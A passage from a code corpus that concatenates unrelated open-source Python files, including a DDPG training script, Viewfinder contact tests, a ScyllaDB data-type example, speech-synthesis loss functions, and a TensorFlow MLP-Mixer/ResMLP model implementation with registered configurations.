r"""Hamiltonian Variational Autoencoder config class.
Parameters:
latent_dim (int): The latent dimension used for the latent space. Default: 10
        n_lf (int): The number of leapfrog steps used in the integrator. Default: 3
        eps_lf (float): The leapfrog stepsize. Default: 1e-3
        beta_zero (float): The tempering factor in the Riemannian Hamiltonian Monte Carlo Sampler.
            Default: 0.3
        learn_eps_lf (bool): Whether the leapfrog stepsize should be learned. Default: False
        learn_beta_zero (bool): Whether the temperature beta_zero should be learned. Default: False.
"""
n_lf: int = 3
eps_lf: float = 0.001
beta_zero: float = 0.3
learn_eps_lf: bool = False
learn_beta_zero: bool = False
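# Hedged usage sketch (not part of the original file): since HVAEConfig is a
# pydantic dataclass, the HMC hyper-parameters are set by plain keyword
# construction; the values below are illustrative only.
def _example_config():
    return HVAEConfig(latent_dim=16, n_lf=5, eps_lf=1e-3, beta_zero=0.3, learn_eps_lf=True)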
|
Chapter18/train_ddpg.py | haohaoxiao/Deep-Reinforcement-Learning-Hands-On-Second-Edition | 621 | 11090354 | <reponame>haohaoxiao/Deep-Reinforcement-Learning-Hands-On-Second-Edition
#!/usr/bin/env python3
import gym
import gym.wrappers
import ptan
import time
import torch
import torch.optim as optim
import torch.nn.functional as F
import numpy as np
import argparse
from tensorboardX import SummaryWriter
import os
from lib import microtaur, ddpg
TIME_LIMIT = 1000
REPLAY_SIZE = 100000
OBS_HISTORY_STEPS = 4
LEARNING_RATE = 1e-4
GAMMA = 0.9
BATCH_SIZE = 64
REPLAY_INITIAL = 10000
TEST_ITERS = 1000
def make_env(reward_scheme: microtaur.RewardScheme, zero_yaw: bool = False):
env = gym.make(microtaur.ENV_ID, reward_scheme=reward_scheme, zero_yaw = zero_yaw)
assert isinstance(env, gym.wrappers.TimeLimit)
env._max_episode_steps = TIME_LIMIT
if OBS_HISTORY_STEPS > 1:
env = ptan.common.wrappers_simple.FrameStack1D(env, OBS_HISTORY_STEPS)
return env
def test_net(net, env, count=10, device="cpu"):
rewards = 0.0
steps = 0
for _ in range(count):
obs = env.reset()
while True:
obs_v = ptan.agent.float32_preprocessor([obs]).to(device)
mu_v = net(obs_v)
action = mu_v.squeeze(dim=0).data.cpu().numpy()
action = np.clip(action, -1, 1)
obs, reward, done, _ = env.step(action)
rewards += reward
steps += 1
if done:
break
return rewards / count, steps / count
if __name__ == "__main__":
microtaur.register()
parser = argparse.ArgumentParser()
parser.add_argument("-n", "--name", required=True, help="Name of the run")
parser.add_argument("--cuda", default=False, action='store_true', help="Use cuda for training")
reward_schemes = [r.name for r in microtaur.RewardScheme]
parser.add_argument("--reward", default='Height', choices=reward_schemes,
help="Reward scheme to use, one of: %s" % reward_schemes)
parser.add_argument("--zero-yaw", default=False, action='store_true', help="Pass zero yaw to observation")
args = parser.parse_args()
device = torch.device("cuda" if args.cuda else "cpu")
save_path = os.path.join("saves", "ddpg-" + args.name)
os.makedirs(save_path, exist_ok=True)
env = make_env(microtaur.RewardScheme[args.reward], zero_yaw=args.zero_yaw)
test_env = make_env(microtaur.RewardScheme[args.reward], zero_yaw=args.zero_yaw)
print("Env: %s, obs=%s, act=%s" % (env, env.observation_space, env.action_space))
act_net = ddpg.DDPGActor(env.observation_space.shape[0], env.action_space.shape[0]).to(device)
crt_net = ddpg.DDPGCritic(env.observation_space.shape[0], env.action_space.shape[0]).to(device)
tgt_act_net = ptan.agent.TargetNet(act_net)
tgt_crt_net = ptan.agent.TargetNet(crt_net)
print("Actor: %s" % act_net)
print("Critic: %s" % crt_net)
writer = SummaryWriter(comment="-ddpg_" + args.name)
agent = ddpg.AgentDDPG(act_net, device=device)
exp_source = ptan.experience.ExperienceSourceFirstLast(env, agent, gamma=GAMMA, steps_count=1)
buffer = ptan.experience.ExperienceReplayBuffer(exp_source, buffer_size=REPLAY_SIZE)
act_opt = optim.Adam(act_net.parameters(), lr=LEARNING_RATE)
crt_opt = optim.Adam(crt_net.parameters(), lr=LEARNING_RATE)
frame_idx = 0
best_reward = None
with ptan.common.utils.RewardTracker(writer) as tracker:
with ptan.common.utils.TBMeanTracker(writer, batch_size=10) as tb_tracker:
while True:
frame_idx += 1
buffer.populate(1)
rewards_steps = exp_source.pop_rewards_steps()
if rewards_steps:
rewards, steps = zip(*rewards_steps)
tb_tracker.track("episode_steps", steps[0], frame_idx)
tracker.reward(rewards[0], frame_idx)
if len(buffer) < REPLAY_INITIAL:
continue
batch = buffer.sample(BATCH_SIZE)
states_v, actions_v, rewards_v, dones_mask, last_states_v = ddpg.unpack_batch_ddpg(batch, device)
# train critic
crt_opt.zero_grad()
q_v = crt_net(states_v, actions_v)
last_act_v = tgt_act_net.target_model(last_states_v)
q_last_v = tgt_crt_net.target_model(last_states_v, last_act_v)
q_last_v[dones_mask] = 0.0
q_ref_v = rewards_v.unsqueeze(dim=-1) + q_last_v * GAMMA
critic_loss_v = F.mse_loss(q_v, q_ref_v.detach())
critic_loss_v.backward()
crt_opt.step()
tb_tracker.track("loss_critic", critic_loss_v, frame_idx)
tb_tracker.track("critic_ref", q_ref_v.mean(), frame_idx)
# train actor
act_opt.zero_grad()
cur_actions_v = act_net(states_v)
actor_loss_v = -crt_net(states_v, cur_actions_v)
actor_loss_v = actor_loss_v.mean()
actor_loss_v.backward()
act_opt.step()
tb_tracker.track("loss_actor", actor_loss_v, frame_idx)
tgt_act_net.alpha_sync(alpha=1 - 1e-3)
tgt_crt_net.alpha_sync(alpha=1 - 1e-3)
if frame_idx % TEST_ITERS == 0:
ts = time.time()
rewards, steps = test_net(act_net, test_env, device=device)
print("Test done in %.2f sec, reward %.3f, steps %d" % (
time.time() - ts, rewards, steps))
writer.add_scalar("test_reward", rewards, frame_idx)
writer.add_scalar("test_steps", steps, frame_idx)
if best_reward is None or best_reward < rewards:
if best_reward is not None:
print("Best reward updated: %.3f -> %.3f" % (best_reward, rewards))
name = "best_%+.3f_%d.dat" % (rewards, frame_idx)
fname = os.path.join(save_path, name)
torch.save(act_net.state_dict(), fname)
best_reward = rewards
|
backend/db/test/contact_test.py | xuantan/viewfinder | 645 | 11090366 | <reponame>xuantan/viewfinder
# -*- coding: utf-8 -*-
# Copyright 2012 Viewfinder Inc. All Rights Reserved.
"""Tests for Contact.
"""
__author__ = '<EMAIL> (<NAME>)'
from viewfinder.backend.base import util
from viewfinder.backend.db import versions
from viewfinder.backend.db.contact import Contact
from viewfinder.backend.db.identity import Identity
from base_test import DBBaseTestCase
class ContactTestCase(DBBaseTestCase):
def testUnlinkIdentity(self):
"""Verify unlinking an identity causes every referencing contact to be updated."""
# Create a Peter contact for Spencer.
timestamp = util.GetCurrentTimestamp()
spencer = self._user
contact_identity = 'Email:<EMAIL>'
contact_name = '<NAME>'
contact_given_name = 'Peter'
contact_family_name = 'Mattis'
contact_rank = 42
contact = Contact.CreateFromKeywords(spencer.user_id,
[(contact_identity, None)],
timestamp,
Contact.GMAIL,
name='<NAME>',
given_name='Peter',
family_name='Mattis',
rank=42)
self._RunAsync(contact.Update, self._client)
peter_ident = self._RunAsync(Identity.Query, self._client, contact_identity, None)
# Unlink peter's identity, which should cause Spencer's contact to be updated.
self._RunAsync(peter_ident.UnlinkIdentity,
self._client,
self._user2.user_id,
contact_identity,
timestamp + 1)
contacts = self._RunAsync(Contact.RangeQuery, self._client, spencer.user_id, None, None, None)
self.assertEqual(len(contacts), 1)
self.assertEqual(contacts[0].sort_key, Contact.CreateSortKey(contact.contact_id, timestamp + 1))
self.assertEqual(contacts[0].name, contact_name)
self.assertEqual(contacts[0].given_name, contact_given_name)
self.assertEqual(contacts[0].family_name, contact_family_name)
self.assertEqual(contacts[0].rank, contact_rank)
def testDerivedAttributes(self):
"""Test that the identity and identities attributes are being properly derived from the
identities_properties attribute.
"""
# Create a Peter contact for Spencer with multiple identical and nearly identical identities.
spencer = self._user
contact_identity_a = 'Email:<EMAIL>'
contact_identity_b = 'Email:<EMAIL>'
contact_identity_c = 'Email:<EMAIL>'
timestamp = util.GetCurrentTimestamp()
contact = Contact.CreateFromKeywords(spencer.user_id,
[(contact_identity_a, None),
(contact_identity_b, 'home'),
(contact_identity_c, 'work')],
timestamp,
Contact.GMAIL,
name='<NAME>',
given_name='Peter',
family_name='Mattis',
rank=42)
self.assertEqual(len(contact.identities_properties), 3)
self.assertEqual(len(contact.identities), 2)
self.assertFalse(contact_identity_a in contact.identities)
self.assertFalse(contact_identity_b in contact.identities)
self.assertFalse(contact_identity_c in contact.identities)
self.assertTrue(Identity.Canonicalize(contact_identity_a) in contact.identities)
self.assertTrue(Identity.Canonicalize(contact_identity_b) in contact.identities)
self.assertTrue(Identity.Canonicalize(contact_identity_c) in contact.identities)
self.assertTrue([contact_identity_a, None] in contact.identities_properties)
self.assertTrue([contact_identity_b, 'home'] in contact.identities_properties)
self.assertTrue([contact_identity_c, 'work'] in contact.identities_properties)
def testUnicodeContactNames(self):
"""Test that contact_id generation works correctly when names include non-ascii characters."""
name = u'ààà朋友你好abc123\U00010000\U00010000\x00\x01\b\n\t '
# The following will assert if there are problems when calculating the hash for the contact_id:
contact_a = Contact.CreateFromKeywords(1,
[('Email:<EMAIL>', None)],
util.GetCurrentTimestamp(),
Contact.GMAIL,
name=name)
contact_b = Contact.CreateFromKeywords(1,
[('Email:<EMAIL>', None)],
util.GetCurrentTimestamp(),
Contact.GMAIL,
name=u'朋' + name[1:])
    # Check that a slight change to a unicode name results in a different contact_id:
self.assertNotEqual(contact_a.contact_id, contact_b.contact_id)
|
models/Loss.py | ishine/StyleSpeech-1 | 106 | 11090379 | <reponame>ishine/StyleSpeech-1<filename>models/Loss.py
import torch
import torch.nn as nn
class StyleSpeechLoss(nn.Module):
""" StyleSpeech Loss """
def __init__(self):
super(StyleSpeechLoss, self).__init__()
self.mse_loss = nn.MSELoss()
self.mae_loss = nn.L1Loss()
def forward(self, mel, mel_target, log_d_predicted, log_d_target,
p_predicted, p_target, e_predicted, e_target, src_len, mel_len):
B = mel_target.shape[0]
log_d_target.requires_grad = False
p_target.requires_grad = False
e_target.requires_grad = False
mel_target.requires_grad = False
mel_loss = 0.
d_loss = 0.
p_loss = 0.
e_loss = 0.
for b, (mel_l, src_l) in enumerate(zip(mel_len, src_len)):
mel_loss += self.mae_loss(mel[b, :mel_l, :], mel_target[b, :mel_l, :])
d_loss += self.mse_loss(log_d_predicted[b, :src_l], log_d_target[b, :src_l])
p_loss += self.mse_loss(p_predicted[b, :src_l], p_target[b, :src_l])
e_loss += self.mse_loss(e_predicted[b, :src_l], e_target[b, :src_l])
mel_loss = mel_loss / B
d_loss = d_loss / B
p_loss = p_loss / B
e_loss = e_loss / B
return mel_loss, d_loss, p_loss, e_loss
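# Hypothetical usage sketch for StyleSpeechLoss above (illustrative only, not part of
# the original file; tensor names and shapes are assumptions):
#   loss_fn = StyleSpeechLoss()
#   mel_loss, d_loss, p_loss, e_loss = loss_fn(
#       mel, mel_target, log_d_pred, log_d_target,
#       p_pred, p_target, e_pred, e_target, src_len, mel_len)
#   total_loss = mel_loss + d_loss + p_loss + e_loss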
class LSGANLoss(nn.Module):
""" LSGAN Loss """
def __init__(self):
super(LSGANLoss, self).__init__()
self.criterion = nn.MSELoss()
def forward(self, r, is_real):
if is_real:
ones = torch.ones(r.size(), requires_grad=False).to(r.device)
loss = self.criterion(r, ones)
else:
zeros = torch.zeros(r.size(), requires_grad=False).to(r.device)
loss = self.criterion(r, zeros)
        return loss
|
src/curt/curt/modules/smarthome/smarthome_service.py | sanyaade-teachings/cep | 108 | 11090385 | """
Copyright (C) Cortic Technology Corp. - All Rights Reserved
Written by <NAME> <<EMAIL>>, 2021
"""
import traceback
import logging
from curt.base_service import BaseService
class SmartHomeService(BaseService):
def __init__(self):
super().__init__()
self.service_type = "SmartHome"
def execute_function(self, worker, data):
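        # The last element of the payload is a flag: True routes data[0] to the worker's
        # config handler, otherwise data[0] is executed as a regular command.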
config_hardware = data[-1]
try:
if config_hardware:
return worker.config_control_handler(data[0])
else:
return worker.command(data[0])
except Exception as e:
            logging.error(traceback.format_exc())
|
mms/python/python-datatypes/python_data_types.py | zimnx/scylla-code-samples | 158 | 11090387 | #!/bin/env python3
from pathlib import Path
from cassandra.cluster import Cluster
from cassandra import ConsistencyLevel
class App:
def __init__(self):
self.cluster = Cluster(contact_points=["scylla-node1", "scylla-node2", "scylla-node3"])
self.session = self.cluster.connect(keyspace="catalog")
self.session.default_consistency_level = ConsistencyLevel.QUORUM
self.insert_ps = self.session.prepare(
query="INSERT INTO mutant_data (first_name,last_name,address,website,picture_file) VALUES (?,?,?,?,?)"
)
self.delete_ps = self.session.prepare(query="DELETE FROM mutant_data WHERE first_name = ? and last_name = ?")
self.get_pic_ps = self.session.prepare(
query="SELECT picture_file FROM mutant_data WHERE first_name = ? and last_name = ?"
)
def show_mutant_data(self):
print("Data that we have in the catalog".center(50, "="))
result = self.session.execute(query="SELECT * FROM mutant_data")
for row in result:
            print(f"{row.first_name} {row.last_name} <{list(row.picture_file.keys())[0]}>")
print("=" * 50)
def add_mutant(self, first_name, last_name, address, website, picture_file):
print(f"\nAdding {first_name} {last_name} with picture <{picture_file}>...")
with open(picture_file, "rb") as mutant_pic:
data = mutant_pic.read()
self.session.execute(query=self.insert_ps,
parameters=[first_name, last_name, address, website, {picture_file: data}])
print("Added.\n")
def save_mutant_photo(self, first_name, last_name, directory=Path("/tmp")):
print(f"Saving {first_name} {last_name} picture to file...")
result = self.session.execute(query=self.get_pic_ps, parameters=[first_name, last_name])
mutant_photos = list(result)[0][0]
for file_name, picture in mutant_photos.items():
dest_dir = directory / file_name
print(f"Saving to <{dest_dir}>")
with dest_dir.open("wb") as file:
file.write(picture)
print("Done.")
def delete_mutant(self, first_name, last_name):
print(f"\nDeleting {first_name} {last_name}...")
self.session.execute(query=self.delete_ps, parameters=[first_name, last_name])
print("Deleted.\n")
def stop(self):
self.cluster.shutdown()
if __name__ == "__main__":
app = App()
app.add_mutant(first_name='Peter', last_name='Parker', address='1515 Main St',
website='http://www.facebook.com/Peter-Parker/', picture_file="peter_parker.jpg")
app.add_mutant(first_name='Maximus', last_name='Lobo', address='New York, Lobo Technologies',
website='https://en.wikipedia.org/wiki/Maximus_Lobo', picture_file="maximus_lobo.png")
app.show_mutant_data()
app.save_mutant_photo(first_name="Peter", last_name="Parker")
app.save_mutant_photo(first_name="Maximus", last_name="Lobo")
app.delete_mutant(first_name="Peter", last_name="Parker")
app.delete_mutant(first_name="Maximus", last_name="Lobo")
app.stop()
|
tfimm/architectures/mlp_mixer.py | gietema/tensorflow-image-models | 154 | 11090388 | """
MLP-Mixer, ResMLP, and gMLP models
This implementation is ported from timm, which is based on the original
implementation from the MLP-Mixer paper.
Official JAX impl:
https://github.com/google-research/vision_transformer/blob/linen/vit_jax/models_mixer.py
Paper: MLP-Mixer: An all-MLP Architecture for Vision
Arxiv: https://arxiv.org/abs/2105.01601
Also supporting ResMLP, and a preliminary implementation of gMLP
Code: https://github.com/facebookresearch/deit
Paper: ResMLP: Feedforward networks for image classification...
Arxiv: https://arxiv.org/abs/2105.03404
Paper: Pay Attention to MLPs
Arxiv: https://arxiv.org/abs/2105.08050
A thank you to paper authors for releasing code and weights.
Copyright 2021 <NAME>
Copyright 2021 <NAME>
"""
from dataclasses import dataclass
from typing import List, Tuple
import tensorflow as tf
from tfimm.layers import (
MLP,
DropPath,
GatedMLP,
GluMLP,
PatchEmbeddings,
norm_layer_factory,
)
from tfimm.models import ModelConfig, keras_serializable, register_model
from tfimm.utils import IMAGENET_DEFAULT_MEAN, IMAGENET_DEFAULT_STD
# Model registry will add each entrypoint function to this
__all__ = ["MLPMixer", "MLPMixerConfig"]
@dataclass
class MLPMixerConfig(ModelConfig):
nb_classes: int = 1000
in_channels: int = 3
input_size: Tuple[int, int] = (224, 224)
patch_size: int = 16
embed_dim: int = 512
nb_blocks: int = 16
mlp_ratio: Tuple[float, float] = (0.5, 4.0)
block_layer: str = "mixer_block"
mlp_layer: str = "mlp"
# Regularization
drop_rate: float = 0.0
drop_path_rate: float = 0.0
# Other parameters
norm_layer: str = "layer_norm_eps_1e-6"
act_layer: str = "gelu"
init_values: float = 1e-4 # Initialisation for ResBlocks
nlhb: bool = False # Negative logarithmic head bias
stem_norm: bool = False
# Parameters for inference
crop_pct: float = 0.875
interpolation: str = "bicubic"
mean: Tuple[float, float, float] = (0.5, 0.5, 0.5)
std: Tuple[float, float, float] = (0.5, 0.5, 0.5)
# Weight transfer
first_conv: str = "stem/proj"
classifier: str = "head"
@property
def nb_patches(self) -> int:
return (self.input_size[0] // self.patch_size) * (
self.input_size[1] // self.patch_size
)
class MixerBlock(tf.keras.layers.Layer):
"""
Residual Block w/ token mixing and channel MLPs
Based on: "MLP-Mixer: An all-MLP Architecture for Vision"
"""
def __init__(self, cfg: MLPMixerConfig, **kwargs):
super().__init__(**kwargs)
self.cfg = cfg
norm_layer = norm_layer_factory(cfg.norm_layer)
mlp_layer = MLP_LAYER_DICT[cfg.mlp_layer]
tokens_dim, channels_dim = [int(x * cfg.embed_dim) for x in cfg.mlp_ratio]
self.norm1 = norm_layer(name="norm1")
self.mlp_tokens = mlp_layer(
hidden_dim=tokens_dim,
embed_dim=cfg.nb_patches,
drop_rate=cfg.drop_rate,
act_layer=cfg.act_layer,
name="mlp_tokens",
)
self.drop_path = DropPath(drop_prob=cfg.drop_path_rate)
self.norm2 = norm_layer(name="norm2")
self.mlp_channels = mlp_layer(
hidden_dim=channels_dim,
embed_dim=cfg.embed_dim,
drop_rate=cfg.drop_rate,
act_layer=cfg.act_layer,
name="mlp_channels",
)
def call(self, x, training=False):
shortcut = x
x = self.norm1(x, training=training)
x = tf.transpose(x, perm=(0, 2, 1))
x = self.mlp_tokens(x, training=training)
x = tf.transpose(x, perm=(0, 2, 1))
x = self.drop_path(x, training=training)
x = x + shortcut
shortcut = x
x = self.norm2(x, training=training)
x = self.mlp_channels(x, training=training)
x = self.drop_path(x, training=training)
x = x + shortcut
return x
class ResBlock(tf.keras.layers.Layer):
"""
Residual MLP block with LayerScale
Based on: ResMLP: Feedforward networks for image classification...
"""
def __init__(self, cfg: MLPMixerConfig, **kwargs):
super().__init__(**kwargs)
self.cfg = cfg
norm_layer = norm_layer_factory(cfg.norm_layer)
mlp_layer = MLP_LAYER_DICT[cfg.mlp_layer]
self.norm1 = norm_layer(name="norm1")
self.linear_tokens = tf.keras.layers.Dense(
units=cfg.nb_patches,
name="linear_tokens",
)
self.drop_path = DropPath(drop_prob=cfg.drop_path_rate)
self.norm2 = norm_layer(name="norm2")
self.mlp_channels = mlp_layer(
hidden_dim=int(cfg.embed_dim * cfg.mlp_ratio[1]),
embed_dim=cfg.embed_dim,
drop_rate=cfg.drop_rate,
act_layer=cfg.act_layer,
name="mlp_channels",
)
def build(self, input_shape):
self.ls1 = self.add_weight(
shape=(self.cfg.embed_dim,),
initializer=tf.keras.initializers.Constant(self.cfg.init_values),
trainable=True,
name="ls1",
)
self.ls2 = self.add_weight(
shape=(self.cfg.embed_dim,),
initializer=tf.keras.initializers.Constant(self.cfg.init_values),
trainable=True,
name="ls2",
)
def call(self, x, training=False):
shortcut = x
x = self.norm1(x, training=training)
x = tf.transpose(x, perm=(0, 2, 1))
x = self.linear_tokens(x, training=training)
x = tf.transpose(x, perm=(0, 2, 1))
x = self.ls1 * x
x = self.drop_path(x, training=training)
x = x + shortcut
shortcut = x
x = self.norm2(x, training=training)
x = self.mlp_channels(x, training=training)
x = self.ls2 * x
x = self.drop_path(x, training=training)
x = x + shortcut
return x
class SpatialGatingBlock(tf.keras.layers.Layer):
"""
Residual Block with Spatial Gating
Based on: Pay Attention to MLPs - https://arxiv.org/abs/2105.08050
"""
def __init__(self, cfg: MLPMixerConfig, **kwargs):
super().__init__(**kwargs)
self.cfg = cfg
norm_layer = norm_layer_factory(cfg.norm_layer)
mlp_layer = MLP_LAYER_DICT[cfg.mlp_layer]
self.norm = norm_layer(name="norm")
self.mlp_channels = mlp_layer(
hidden_dim=int(cfg.embed_dim * cfg.mlp_ratio[1]),
embed_dim=cfg.embed_dim,
drop_rate=cfg.drop_rate,
act_layer=cfg.act_layer,
name="mlp_channels",
)
self.drop_path = DropPath(drop_prob=cfg.drop_path_rate)
def call(self, x, training=False):
shortcut = x
x = self.norm(x, training=training)
x = self.mlp_channels(x, training=training)
x = self.drop_path(x, training=training)
x = x + shortcut
return x
BLOCK_LAYER_DICT = {
"mixer_block": MixerBlock,
"res_block": ResBlock,
"spatial_gating_block": SpatialGatingBlock,
}
MLP_LAYER_DICT = {
"mlp": MLP,
"glu_mlp": GluMLP,
"gated_mlp": GatedMLP,
}
@keras_serializable
class MLPMixer(tf.keras.Model):
cfg_class = MLPMixerConfig
def __init__(self, cfg: MLPMixerConfig, *args, **kwargs):
super().__init__(*args, **kwargs)
self.cfg = cfg
self.nb_features = cfg.embed_dim
norm_layer = norm_layer_factory(cfg.norm_layer)
block_layer = BLOCK_LAYER_DICT[cfg.block_layer]
self.stem = PatchEmbeddings(
patch_size=cfg.patch_size,
embed_dim=cfg.embed_dim,
norm_layer=cfg.norm_layer if cfg.stem_norm else "",
name="stem",
)
self.blocks = [
block_layer(cfg=cfg, name=f"blocks/{j}") for j in range(cfg.nb_blocks)
]
self.norm = norm_layer(name="norm")
self.head = (
tf.keras.layers.Dense(units=cfg.nb_classes, name="head")
if cfg.nb_classes > 0
else tf.keras.layers.Activation("linear")
)
@property
def dummy_inputs(self) -> tf.Tensor:
return tf.zeros((1, *self.cfg.input_size, self.cfg.in_channels))
@property
def feature_names(self) -> List[str]:
return (
["stem"]
+ [f"block_{j}" for j in range(self.cfg.nb_blocks)]
+ ["features_all", "features", "logits"]
)
def forward_features(self, x, training=False, return_features=False):
features = {}
x = self.stem(x, training=training)
features["stem"] = x
for j, block in enumerate(self.blocks):
x = block(x, training=training)
features[f"block_{j}"] = x
x = self.norm(x, training=training)
features["features_all"] = x
x = tf.reduce_mean(x, axis=1)
features["features"] = x
return (x, features) if return_features else x
def call(self, x, training=False, return_features=False):
features = {}
x = self.forward_features(x, training, return_features)
if return_features:
x, features = x
x = self.head(x)
features["logits"] = x
return (x, features) if return_features else x
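# Hypothetical usage sketch for MLPMixer (illustrative only, not part of the original
# module; the hyper-parameters below are made up for a quick smoke test):
#   cfg = MLPMixerConfig(name="mixer_demo", url="", patch_size=32, embed_dim=128, nb_blocks=2)
#   model = MLPMixer(cfg, name=cfg.name)
#   logits = model(model.dummy_inputs)  # shape (1, cfg.nb_classes)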
@register_model
def mixer_s32_224():
"""
Mixer-S/32 224x224
Paper: MLP-Mixer: An all-MLP Architecture for Vision
Link: https://arxiv.org/abs/2105.01601
"""
cfg = MLPMixerConfig(
name="mixer_s32_224",
url="[timm]",
patch_size=32,
embed_dim=512,
nb_blocks=8,
)
return MLPMixer, cfg
@register_model
def mixer_s16_224():
"""
Mixer-S/16 224x224
Paper: MLP-Mixer: An all-MLP Architecture for Vision
Link: https://arxiv.org/abs/2105.01601
"""
cfg = MLPMixerConfig(
name="mixer_s16_224",
url="[timm]",
patch_size=16,
embed_dim=512,
nb_blocks=8,
)
return MLPMixer, cfg
@register_model
def mixer_b32_224():
"""
Mixer-B/32 224x224
Paper: MLP-Mixer: An all-MLP Architecture for Vision
Link: https://arxiv.org/abs/2105.01601
"""
cfg = MLPMixerConfig(
name="mixer_b32_224",
url="[timm]",
patch_size=32,
embed_dim=768,
nb_blocks=12,
)
return MLPMixer, cfg
@register_model
def mixer_b16_224():
"""Mixer-B/16 224x224. ImageNet-1k pretrained weights.
Paper: MLP-Mixer: An all-MLP Architecture for Vision
Link: https://arxiv.org/abs/2105.01601
"""
cfg = MLPMixerConfig(
name="mixer_b16_224",
url="[timm]",
patch_size=16,
embed_dim=768,
nb_blocks=12,
)
return MLPMixer, cfg
@register_model
def mixer_b16_224_in21k():
"""
Mixer-B/16 224x224. ImageNet-21k pretrained weights.
Paper: MLP-Mixer: An all-MLP Architecture for Vision
Link: https://arxiv.org/abs/2105.01601
"""
cfg = MLPMixerConfig(
name="mixer_b16_224_in21k",
url="[timm]",
nb_classes=21843,
patch_size=16,
embed_dim=768,
nb_blocks=12,
)
return MLPMixer, cfg
@register_model
def mixer_l32_224():
"""
Mixer-L/32 224x224.
Paper: MLP-Mixer: An all-MLP Architecture for Vision
Link: https://arxiv.org/abs/2105.01601
"""
cfg = MLPMixerConfig(
name="mixer_l32_224",
url="[timm]",
patch_size=32,
embed_dim=1024,
nb_blocks=24,
)
return MLPMixer, cfg
@register_model
def mixer_l16_224():
"""
Mixer-L/16 224x224. ImageNet-1k pretrained weights.
Paper: MLP-Mixer: An all-MLP Architecture for Vision
Link: https://arxiv.org/abs/2105.01601
"""
cfg = MLPMixerConfig(
name="mixer_l16_224",
url="[timm]",
patch_size=16,
embed_dim=1024,
nb_blocks=24,
)
return MLPMixer, cfg
@register_model
def mixer_l16_224_in21k():
"""
Mixer-L/16 224x224. ImageNet-21k pretrained weights.
Paper: MLP-Mixer: An all-MLP Architecture for Vision
Link: https://arxiv.org/abs/2105.01601
"""
cfg = MLPMixerConfig(
name="mixer_l16_224_in21k",
url="[timm]",
nb_classes=21843,
patch_size=16,
embed_dim=1024,
nb_blocks=24,
)
return MLPMixer, cfg
@register_model
def mixer_b16_224_miil():
"""
    Mixer-B/16 224x224. ImageNet-1k pretrained weights.
Paper: MLP-Mixer: An all-MLP Architecture for Vision
Link: https://arxiv.org/abs/2105.01601
Weights taken from: https://github.com/Alibaba-MIIL/ImageNet21K
"""
cfg = MLPMixerConfig(
name="mixer_b16_224_miil",
url="[timm]",
patch_size=16,
embed_dim=768,
nb_blocks=12,
crop_pct=0.875,
interpolation="bilinear",
mean=(0.0, 0.0, 0.0),
std=(1.0, 1.0, 1.0),
)
return MLPMixer, cfg
@register_model
def mixer_b16_224_miil_in21k():
"""
    Mixer-B/16 224x224. ImageNet-21k pretrained weights.
Paper: MLP-Mixer: An all-MLP Architecture for Vision
Link: https://arxiv.org/abs/2105.01601
Weights taken from: https://github.com/Alibaba-MIIL/ImageNet21K
"""
cfg = MLPMixerConfig(
name="mixer_b16_224_miil_in21k",
url="[timm]",
nb_classes=11221,
patch_size=16,
embed_dim=768,
nb_blocks=12,
crop_pct=0.875,
interpolation="bilinear",
mean=(0.0, 0.0, 0.0),
std=(1.0, 1.0, 1.0),
)
return MLPMixer, cfg
@register_model
def gmixer_12_224():
"""
Glu-Mixer-12 224x224
Experiment by <NAME>, adding (Si)GLU to MLP-Mixer
"""
cfg = MLPMixerConfig(
name="gmixer_12_224",
url="[timm]",
patch_size=16,
embed_dim=384,
nb_blocks=12,
mlp_ratio=(1.0, 4.0),
mlp_layer="glu_mlp",
act_layer="swish",
mean=IMAGENET_DEFAULT_MEAN,
std=IMAGENET_DEFAULT_STD,
)
return MLPMixer, cfg
@register_model
def gmixer_24_224():
"""
Glu-Mixer-24 224x224
Experiment by <NAME>, adding (Si)GLU to MLP-Mixer
"""
cfg = MLPMixerConfig(
name="gmixer_24_224",
url="[timm]",
patch_size=16,
embed_dim=384,
nb_blocks=24,
mlp_ratio=(1.0, 4.0),
mlp_layer="glu_mlp",
act_layer="swish",
mean=IMAGENET_DEFAULT_MEAN,
std=IMAGENET_DEFAULT_STD,
)
return MLPMixer, cfg
@register_model
def resmlp_12_224():
"""
ResMLP-12
Paper: ResMLP: Feedforward networks for image classification...
Link: https://arxiv.org/abs/2105.03404
"""
cfg = MLPMixerConfig(
name="resmlp_12_224",
url="[timm]",
patch_size=16,
embed_dim=384,
nb_blocks=12,
mlp_ratio=(4.0, 4.0),
block_layer="res_block",
norm_layer="affine",
mean=IMAGENET_DEFAULT_MEAN,
std=IMAGENET_DEFAULT_STD,
)
return MLPMixer, cfg
@register_model
def resmlp_24_224():
"""
ResMLP-24
Paper: ResMLP: Feedforward networks for image classification...
Link: https://arxiv.org/abs/2105.03404
"""
cfg = MLPMixerConfig(
name="resmlp_24_224",
url="[timm]",
patch_size=16,
embed_dim=384,
nb_blocks=24,
mlp_ratio=(4.0, 4.0),
block_layer="res_block",
init_values=1e-5,
norm_layer="affine",
mean=IMAGENET_DEFAULT_MEAN,
std=IMAGENET_DEFAULT_STD,
)
return MLPMixer, cfg
@register_model
def resmlp_36_224():
"""
ResMLP-36
Paper: ResMLP: Feedforward networks for image classification...
Link: https://arxiv.org/abs/2105.03404
"""
cfg = MLPMixerConfig(
name="resmlp_36_224",
url="[timm]",
patch_size=16,
embed_dim=384,
nb_blocks=36,
mlp_ratio=(4.0, 4.0),
block_layer="res_block",
init_values=1e-6,
norm_layer="affine",
mean=IMAGENET_DEFAULT_MEAN,
std=IMAGENET_DEFAULT_STD,
)
return MLPMixer, cfg
@register_model
def resmlp_big_24_224():
"""
ResMLP-B-24
Paper: ResMLP: Feedforward networks for image classification...
Link: https://arxiv.org/abs/2105.03404
"""
cfg = MLPMixerConfig(
name="resmlp_big_24_224",
url="[timm]",
patch_size=8,
embed_dim=768,
nb_blocks=24,
mlp_ratio=(4.0, 4.0),
block_layer="res_block",
init_values=1e-6,
norm_layer="affine",
mean=IMAGENET_DEFAULT_MEAN,
std=IMAGENET_DEFAULT_STD,
)
return MLPMixer, cfg
@register_model
def resmlp_12_distilled_224():
"""
ResMLP-12
Paper: ResMLP: Feedforward networks for image classification...
Link: https://arxiv.org/abs/2105.03404
"""
cfg = MLPMixerConfig(
name="resmlp_12_distilled_224",
url="[timm]",
patch_size=16,
embed_dim=384,
nb_blocks=12,
mlp_ratio=(4.0, 4.0),
block_layer="res_block",
norm_layer="affine",
mean=IMAGENET_DEFAULT_MEAN,
std=IMAGENET_DEFAULT_STD,
)
return MLPMixer, cfg
@register_model
def resmlp_24_distilled_224():
"""
ResMLP-24
Paper: ResMLP: Feedforward networks for image classification...
Link: https://arxiv.org/abs/2105.03404
